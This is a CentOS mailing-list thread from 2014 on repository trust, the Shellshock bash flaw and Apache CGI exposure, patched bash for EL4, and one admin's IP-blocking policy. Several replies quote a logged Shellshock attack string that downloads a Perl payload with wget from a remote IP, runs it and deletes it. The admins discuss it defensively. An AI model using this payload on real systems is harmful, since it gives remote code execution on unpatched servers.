On Thu, September 25, 2014 12:42, m.roth@5-cent.us wrote:
Thanks, I sit (and type) corrected. There was something nagging at me, saying Russia was wrong for Nux. However, I don't foresee aforesaid manager being happy with an eastern European individual's repo.
You, and your boss, should become aware that Romania joined the North Atlantic Treaty Organisation (NATO) on March 29, 2004. The United States presently has a formal military alliance with Romania. The same one that it has with Canada, Turkey, Great Britain, and most of Europe.
James B. Byrne wrote:
On Thu, September 25, 2014 12:42, m.roth@5-cent.us wrote:
Thanks, I sit (and type) corrected. There was something nagging at me, saying Russia was wrong for Nux. However, I don't foresee aforesaid manager being happy with an eastern European individual's repo.
You, and your boss, should become aware that Romania joined the North Atlantic Treaty Organisation (NATO) on March 29, 2004. The United States presently has a formal military alliance with Romania. The same one that it has with Canada, Turkey, Great Britain, and most of Europe.
Assuming this gets through - my hosting provider's mailhost is being blocked, AGAIN, by those assholes at IX magazine that run nixspam....
It's still not one of the large repos, and (if yuo didn't see my other response), we have no knowledge of how secure his server, where he hosts his repo, is from being hacked. We *do* have to, legally, worry about HIPAA (personal health data) and PII data.
We'll ignore the concept of telling scores of people that they have to not use the browser they know, and have to learn a new one....
mark
On Fri, September 26, 2014 11:56 am, James B. Byrne wrote:
On Thu, September 25, 2014 12:42, m.roth@5-cent.us wrote:
Thanks, I sit (and type) corrected. There was something nagging at me, saying Russia was wrong for Nux. However, I don't foresee aforesaid manager being happy with an eastern European individual's repo.
You, and your boss, should become aware that Romania joined the North Atlantic Treaty Organisation (NATO) on March 29, 2004. The United States presently has a formal military alliance with Romania. The same one that it has with Canada, Turkey, Great Britain, and most of Europe.
I hope, "my" government doesn't go into alliance with Russia behind my back ;-) (I'm perfectly OK about Romania, no matter how much more careful I'll be about repositories hosted there compared to the ones hosted, say, in Finland, just based on statistics of compromised machines...)
Valeri
++++++++++++++++++++++++++++++++++++++++ Valeri Galtsev Sr System Administrator Department of Astronomy and Astrophysics Kavli Institute for Cosmological Physics University of Chicago Phone: 773-702-4247 ++++++++++++++++++++++++++++++++++++++++
Valeri Galtsev wrote:
On Fri, September 26, 2014 11:56 am, James B. Byrne wrote:
On Thu, September 25, 2014 12:42, m.roth@5-cent.us wrote:
Thanks, I sit (and type) corrected. There was something nagging at me, saying Russia was wrong for Nux. However, I don't foresee aforesaid manager being happy with an eastern European individual's repo.
You, and your boss, should become aware that Romania joined the North Atlantic Treaty Organisation (NATO) on March 29, 2004. The United States presently has a formal military alliance with Romania. The same one that it has with Canada, Turkey, Great Britain, and most of Europe.
I hope, "my" government doesn't go into alliance with Russia behind my back ;-) (I'm perfectly OK about Romania, no matter how much more careful I'll be about repositories hosted there compared to the ones hosted, say, in Finland, just based on statistics of compromised machines...)
Please, please note: we're *NOT* US DoD* - we try to help people.... <g>
What, you're not looking forward to the Ukraine hosting repos...?
mark
* Old, old t-shirt line: join the Army, travel to distant lands, meet exotic people, and learn to kill them.
I hope, "my" government doesn't go into alliance with Russia behind my back ;-) (I'm perfectly OK about Romania, no matter how much more careful I'll be about repositories hosted there compared to the ones hosted, say, in Finland, just based on statistics of compromised machines...)
These guys they just don't get the hint and then we have to watch in disgust their heads being cut off by the friends of Libya :)
On 9/26/2014 2:51 PM, Always Learning wrote:
Probably all Windoze
linux apache web servers with the bash exploit are getting owned en masse today. my (patched) internet web server has logged 100s and 100s of attempts like...
66.186.2.172 - - [26/Sep/2014:00:49:29 -0700] "GET /cgi-bin/test.sh HTTP/1.0" 404 294 "-" "() { :;}; /bin/bash -c "wget -O /var/tmp/wow1 208.118.61.44/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1""
On Fri, September 26, 2014 5:13 pm, John R Pierce wrote:
On 9/26/2014 2:51 PM, Always Learning wrote:
Probably all Windoze
linux apache web servers with the bash exploit are getting owned en masse today. my (patched) internet web server has logged 100s and 100s of attempts like...
66.186.2.172 - - [26/Sep/2014:00:49:29 -0700] "GET /cgi-bin/test.sh
I feel really stupid, but I have to ask. If your server wasn't patched, it only would have owned by the above if that file exists, is executable by apache and it indeed invokes bash (say, has #!/bin/bash or whatever bash location is as first line), right? ;-)
Valeri
++++++++++++++++++++++++++++++++++++++++ Valeri Galtsev Sr System Administrator Department of Astronomy and Astrophysics Kavli Institute for Cosmological Physics University of Chicago Phone: 773-702-4247 ++++++++++++++++++++++++++++++++++++++++
On 2014-09-26, Valeri Galtsev galtsev@kicp.uchicago.edu wrote:
On Fri, September 26, 2014 5:13 pm, John R Pierce wrote:
linux apache web servers with the bash exploit are getting owned en masse today. my (patched) internet web server has logged 100s and 100s of attempts like...
66.186.2.172 - - [26/Sep/2014:00:49:29 -0700] "GET /cgi-bin/test.sh
I feel really stupid, but I have to ask. If your server wasn't patched, it only would have owned by the above if that file exists, is executable by apache and it indeed invokes bash (say, has #!/bin/bash or whatever bash location is as first line), right? ;-)
At first glance I would agree with you, but then I would wonder, if that request wouldn't work almost anywhere, why are the skr1pt k1dd13s doing it?
--keith
On Sat, Sep 27, 2014 at 11:02 AM, Keith Keller < kkeller@wombat.san-francisco.ca.us> wrote:
On 2014-09-26, Valeri Galtsev galtsev@kicp.uchicago.edu wrote:
On Fri, September 26, 2014 5:13 pm, John R Pierce wrote:
linux apache web servers with the bash exploit are getting owned en masse today. my (patched) internet web server has logged 100s and 100s of attempts like...
66.186.2.172 - - [26/Sep/2014:00:49:29 -0700] "GET /cgi-bin/test.sh
I feel really stupid, but I have to ask. If your server wasn't patched,
it
only would have owned by the above if that file exists, is executable by apache and it indeed invokes bash (say, has #!/bin/bash or whatever bash location is as first line), right? ;-)
At first glance I would agree with you, but then I would wonder, if that request wouldn't work almost anywhere, why are the skr1pt k1dd13s doing it?
Old source versions of Apache used to come with a test.sh file in the default cgi-bin directory, but those days are long gone, I suspect.
Cheers,
Cliff
On 9/26/2014 3:36 PM, Valeri Galtsev wrote:
On Fri, September 26, 2014 5:13 pm, John R Pierce wrote:
On 9/26/2014 2:51 PM, Always Learning wrote:
Probably all Windoze
linux apache web servers with the bash exploit are getting owned en masse today. my (patched) internet web server has logged 100s and 100s of attempts like...
66.186.2.172 - - [26/Sep/2014:00:49:29 -0700] "GET /cgi-bin/test.sh
I feel really stupid, but I have to ask. If your server wasn't patched, it only would have owned by the above if that file exists, is executable by apache and it indeed invokes bash (say, has #!/bin/bash or whatever bash location is as first line), right?
no. mod_cgi launches /bin/sh and passes it the command, even if the file doesn't exist. and /bin/sh is linked to bash
On Fri, September 26, 2014 6:05 pm, John R Pierce wrote:
On 9/26/2014 3:36 PM, Valeri Galtsev wrote:
On Fri, September 26, 2014 5:13 pm, John R Pierce wrote:
On 9/26/2014 2:51 PM, Always Learning wrote:
Probably all Windoze
linux apache web servers with the bash exploit are getting owned en masse today. my (patched) internet web server has logged 100s and 100s of attempts like...
66.186.2.172 - - [26/Sep/2014:00:49:29 -0700] "GET /cgi-bin/test.sh
I feel really stupid, but I have to ask. If your server wasn't patched, it only would have owned by the above if that file exists, is executable by apache and it indeed invokes bash (say, has #!/bin/bash or whatever bash location is as first line), right?
no. mod_cgi launches /bin/sh and passes it the command, even if the file doesn't exist. and /bin/sh
Damn, indeed it is not sh, but symlink to bash. Crap! Am I already to that extent FreeBSD and not Linux guy...
Ba
Valeri
++++++++++++++++++++++++++++++++++++++++ Valeri Galtsev Sr System Administrator Department of Astronomy and Astrophysics Kavli Institute for Cosmological Physics University of Chicago Phone: 773-702-4247 ++++++++++++++++++++++++++++++++++++++++
On 2014-09-26, John R Pierce pierce@hogranch.com wrote:
On Fri, September 26, 2014 5:13 pm, John R Pierce wrote:
66.186.2.172 - - [26/Sep/2014:00:49:29 -0700] "GET /cgi-bin/test.sh
no. mod_cgi launches /bin/sh and passes it the command, even if the file doesn't exist. and /bin/sh is linked to bash
Wouldn't you need a particular Apache configuration for mod_cgi to launch /bin/sh? e.g., /cgi-bin/ configured as a ScriptAlias, and/or *.sh configured with an appropriate handler? Granted that's likely a common configuration, but a site without a configured /cgi-bin/ should be immune to this attack even if their /bin/sh is a symlink to /bin/bash.
--keith
Hi,
Anybody has bash package to Redhat 4 ?
tks
On Mon, Sep 29, 2014 at 11:33:08AM -0200, Eduardo Augusto Pinto wrote:
Hi,
Anybody has bash package to Redhat 4 ?
I imagine Red Hat does as they are providing support for EL4 still if you are willing to pay for it.
John
On Mon, Sep 29, 2014 at 8:41 AM, John R. Dennison jrd@gerdesas.com wrote:
On Mon, Sep 29, 2014 at 11:33:08AM -0200, Eduardo Augusto Pinto wrote:
Hi,
Anybody has bash package to Redhat 4 ?
I imagine Red Hat does as they are providing support for EL4 still if you are willing to pay for it.
Or the Oracle version that you can download should work too: https://oss.oracle.com/el4/SRPMS-updates/bash-3.0-27.0.2.el4.src.rpm or the equivalent binary rpm under http://public-yum.oracle.com/repo/EnterpriseLinux/EL4/latest/x86_64/
On Mon, Sep 29, 2014 at 09:54:45AM -0500, Les Mikesell wrote:
Or the Oracle version that you can download should work too: https://oss.oracle.com/el4/SRPMS-updates/bash-3.0-27.0.2.el4.src.rpm or the equivalent binary rpm under http://public-yum.oracle.com/repo/EnterpriseLinux/EL4/latest/x86_64/
Or... you could pay Red Hat for support on the EOL release if you want it, you know... supported.
El4 went out of standard support on 2/29/2012. If you are still running EL4 and want updates pay for 'em.
John
This
On Sep 29, 2014, at 10:00 AM, John R. Dennison jrd@gerdesas.com wrote:
On Mon, Sep 29, 2014 at 09:54:45AM -0500, Les Mikesell wrote:
Or the Oracle version that you can download should work too: https://oss.oracle.com/el4/SRPMS-updates/bash-3.0-27.0.2.el4.src.rpm or the equivalent binary rpm under http://public-yum.oracle.com/repo/EnterpriseLinux/EL4/latest/x86_64/
Or... you could pay Red Hat for support on the EOL release if you want it, you know... supported.
El4 went out of standard support on 2/29/2012. If you are still running EL4 and want updates pay for 'em.
John-- When good is dumb, evil will always triumph.
-- Jeff Atwood, 28 May 2008, Coding Horror Blog, 23 November 2000 _______________________________________________ CentOS mailing list CentOS@centos.org http://lists.centos.org/mailman/listinfo/centos
Les Mikesell wrote:
Or the Oracle version that you can download should work too: https://oss.oracle.com/el4/SRPMS-updates/bash-3.0-27.0.2.el4.src.rpm or the equivalent binary rpm under http://public-yum.oracle.com/repo/EnterpriseLinux/EL4/latest/x86_64/
They now have a more recent version available: bash-3.0-27.0.3.el4.src.rpm
James Pearson
On Fri, September 26, 2014 6:05 pm, John R Pierce wrote:
On 9/26/2014 3:36 PM, Valeri Galtsev wrote:
On Fri, September 26, 2014 5:13 pm, John R Pierce wrote:
On 9/26/2014 2:51 PM, Always Learning wrote:
Probably all Windoze
linux apache web servers with the bash exploit are getting owned en masse today. my (patched) internet web server has logged 100s and 100s of attempts like...
66.186.2.172 - - [26/Sep/2014:00:49:29 -0700] "GET /cgi-bin/test.sh
I feel really stupid, but I have to ask. If your server wasn't patched, it only would have owned by the above if that file exists, is executable by apache and it indeed invokes bash (say, has #!/bin/bash or whatever bash location is as first line), right?
no. mod_cgi launches /bin/sh and passes it the command, even if the file doesn't exist. and /bin/sh is linked to bash
Apache passes it to mod_cgi to have that discover that referenced file doesn't exist?! Did I too program like that when I was programmer?
Valeri
++++++++++++++++++++++++++++++++++++++++ Valeri Galtsev Sr System Administrator Department of Astronomy and Astrophysics Kavli Institute for Cosmological Physics University of Chicago Phone: 773-702-4247 ++++++++++++++++++++++++++++++++++++++++
On Fri, 2014-09-26 at 16:05 -0700, John R Pierce wrote:
no. mod_cgi launches /bin/sh and passes it the command, even if the file doesn't exist. and /bin/sh is linked to bash
Don't use cgi. Have no /cgi directory. Don't load mod_cgi
Bash is patched (updated to new version). Automatically bloke IPs of anyone trying to hack Apache. Am I safe ?
Paul. England, EU.
Learning until I die or experience dementia.
On Fri, September 26, 2014 8:32 pm, Always Learning wrote:
On Fri, 2014-09-26 at 16:05 -0700, John R Pierce wrote:
no. mod_cgi launches /bin/sh and passes it the command, even if the file doesn't exist. and /bin/sh is linked to bash
Don't use cgi. Have no /cgi directory. Don't load mod_cgi
Bash is patched (updated to new version). Automatically bloke IPs of anyone trying to hack Apache. Am I safe ?
You are. But if you run the server you do want to serve what you want to serve. Now, imagine hotel, everybody in it is behind a single router. One person has hacked machine that tried to tap into your server. You block the IP, therefore everyone in Hotel... Now do you want to serve it? If not why to start Apache at all? However, my case is different. If servers of our Departments don't serve anything [we need] to everybody, they do not need me, sysadmin, desktop support guy will be more suitable (and probably less expensive).
Just my $0.02
Valeri
++++++++++++++++++++++++++++++++++++++++ Valeri Galtsev Sr System Administrator Department of Astronomy and Astrophysics Kavli Institute for Cosmological Physics University of Chicago Phone: 773-702-4247 ++++++++++++++++++++++++++++++++++++++++
Hi Valeri,
On Fri, September 26, 2014 8:32 pm, Always Learning wrote:
Don't use cgi. Have no /cgi directory. Don't load mod_cgi
Bash is patched (updated to new version). Automatically bloke IPs of anyone trying to hack Apache. Am I safe ?
You are. But if you run the server you do want to serve what you want to serve. Now, imagine hotel, everybody in it is behind a single router. One person has hacked machine that tried to tap into your server. You block the IP, therefore everyone in Hotel... Now do you want to serve it? If not why to start Apache at all? However, my case is different. If servers of our Departments don't serve anything [we need] to everybody, they do not need me, sysadmin, desktop support guy will be more suitable (and probably less expensive).
If a hacker, always using someone else's compromised computer, attempts to break-in, their IP is blocked for all traffic within about 1 second.
Yes that means one hacked computer's IP address is blocked for mail and web. I decline to let the hacker have repeated attempts to hack into, or abuse, any of my web sites.
If there are only a few access attempts after the IP address is blocked, the ban will expire monthly. If there are very many attempts, then the ban will expire about 3 weeks after the attempts stop.
If this inconvenience's an innocent web user, I have neither ability to detect the inconvenience nor to determine the user's innocence. I understand your hotel analogue. In England many hotel guests use their mobile phones or tablets - not on wifi but on direct radio (mobile telephone) links; each link having a distinctive IP address.
If the web hacker is operating through a data centre, then I permanently block, for port 80, the whole of the data centre's known IP block.
The alternative is to be a willing victim.
Best regards,
Paul England - the USA's government's pet European poodle.
V,
Sorry that should be ...
I understand your hotel analogy.
P.
On Fri, Sep 26, 2014 at 10:38 PM, Always Learning centos@u62.u22.net wrote:
If this inconvenience's an innocent web user, I have neither ability to detect the inconvenience nor to determine the user's innocence. I understand your hotel analogue. In England many hotel guests use their mobile phones or tablets - not on wifi but on direct radio (mobile telephone) links; each link having a distinctive IP address.
If the web hacker is operating through a data centre, then I permanently block, for port 80, the whole of the data centre's known IP block.
The alternative is to be a willing victim.
It's more a question of why you run the service at all. If blocking people from reaching it doesn't bother you, why not just shut it down?
On Mon, 2014-09-29 at 12:16 -0500, Les Mikesell wrote:
On Fri, Sep 26, 2014 at 10:38 PM, Always Learning centos@u62.u22.net wrote:
If this inconvenience's an innocent web user, I have neither ability to detect the inconvenience nor to determine the user's innocence. I understand your hotel analogue. In England many hotel guests use their mobile phones or tablets - not on wifi but on direct radio (mobile telephone) links; each link having a distinctive IP address.
If the web hacker is operating through a data centre, then I permanently block, for port 80, the whole of the data centre's known IP block.
The alternative is to be a willing victim.
It's more a question of why you run the service at all. If blocking people from reaching it doesn't bother you, why not just shut it down?
Blocking people ? Data Centre bots that download all or parts of my web sites for someone's personal amusement or for commercial gain of their customers or simply to find email addresses to use for spamming, are not the 'people' I want to attract.
Why should I tolerate some malicious nutter trying to hack into my web servers ? Better to block their IP after the first attempt.
Why should I close everything because of a very small, but very active, group of pests ? Better to block the compromised IPs and the rent-an-IP-address-for-a-few-hours services whilst letting everything else continue normally.
No logical reason to give spammers and hackers unrestricted access. Abuse my facilities and my systems will cut them off. Its a simple and effective policy.
On Mon, Sep 29, 2014 at 1:57 PM, Always Learning centos@u62.u22.net wrote:
The alternative is to be a willing victim.
It's more a question of why you run the service at all. If blocking people from reaching it doesn't bother you, why not just shut it down?
Blocking people ? Data Centre bots that download all or parts of my web sites for someone's personal amusement or for commercial gain of their customers or simply to find email addresses to use for spamming, are not the 'people' I want to attract.
You said you were blocking IPs. The IPs you see don't represent people or even specific devices and you have no way of knowing the correspondence.
Why should I tolerate some malicious nutter trying to hack into my web servers ? Better to block their IP after the first attempt.
Why tolerate anyone?
On Mon, 2014-09-29 at 14:16 -0500, Les Mikesell wrote:
You said you were blocking IPs.
Yes my systems block IPs on the basis:-
Emails ------ Block if IP allocated to a data centre or to a commercial email sending organisation.
Web --- Hacking attempts - individual IP if a 'home-type' Internet connection. Block if IP allocated to a data centre.
Hosts (email) ------------
Persistent pests using 'home-type' Internet connections are added to the spammers list. Example
*airtelbroadband.in *adsl.alicedsl.de *dynamic.se.alltele.net *alshamil.net.ae *adsl.anteldata.net.uy *aphie.info *pools.arcor-ip.net *static.arcor-ip.net *as9105.com *as13285.net *as43234.net
Thus no actual IPs are banned in this instance.
Duration -------- Individual IPs about 4 weeks. Blocks indefinite. Hosts lists indefinite.
The IPs you see don't represent people or even specific devices and you have no way of knowing the correspondence.
I think genuine email senders will use a real MTA rather than something, taken from today's list, like:-
host-93-178-107-188.ttn.ru 249.119.233.72.static.reverse.ltdomains.com dab-yat1-h-61-9.dab.02.net
If the correspondence is genuinely important, then the sender will obviously know my details including phone number and/or postal address.
Why tolerate anyone?
Because it is my systems, paid with my money, and therefore it is my choice to accept everyone - also my choice not to tolerate hacking attempts and junk mail. I previously stated I will not be a placid victim for hacking attacks or for spamming.
Long gone are the gentlemen's days of the Internet when mail relaying via third parties was acceptable, normal and never ever abused. Unless one can successfully adapt to the inevitable changes throughout life, one's existence is doomed.
I wish to stop this topic now and do other things.
-
Always Learning -
Cliff Pratt -
Eduardo Augusto Pinto -
James B. Byrne -
James Pearson -
John R Pierce -
John R. Dennison -
Keith Keller -
Les Mikesell -
m.roth@5-cent.us -
Valeri Galtsev -
William Woods -
Александр Кириллов